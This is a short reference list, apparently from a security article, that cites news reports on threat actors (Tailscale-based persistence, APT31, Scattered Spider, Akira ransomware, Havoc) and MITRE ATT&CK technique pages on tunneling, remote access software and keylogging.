- Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html
- MITRE ATT&CK. (2024). Protocol Tunneling (T1572). https://attack.mitre.org/techniques/T1572/
- MITRE ATT&CK. (2024). Remote Access Software (T1219). https://attack.mitre.org/techniques/T1219/
- MITRE ATT&CK. (2024). Input Capture: Keylogging (T1056.001). https://attack.mitre.org/techniques/T1056/001/
- Tailscale. (2026). How Tailscale Works. https://tailscale.com/blog/how-tailscale-works
- The Hacker News. (2025, November). China-Linked APT31 Launches Stealthy Operations. https://thehackernews.com/2025/11/china-linked-apt31-launches-stealthy.html
- The Hacker News. (2023, November). US Cybersecurity Agencies Warn of Scattered Spider. https://thehackernews.com/2023/11/us-cybersecurity-agencies-warn-of.html
- The Hacker News. (2025, September). SonicWall SSL VPN Flaw and Akira Ransomware. https://thehackernews.com/2025/09/sonicwall-ssl-vpn-flaw-and.html
- The Hacker News. (2023, February). Threat Actors Adopt Havoc Framework for Post-Exploitation. https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html
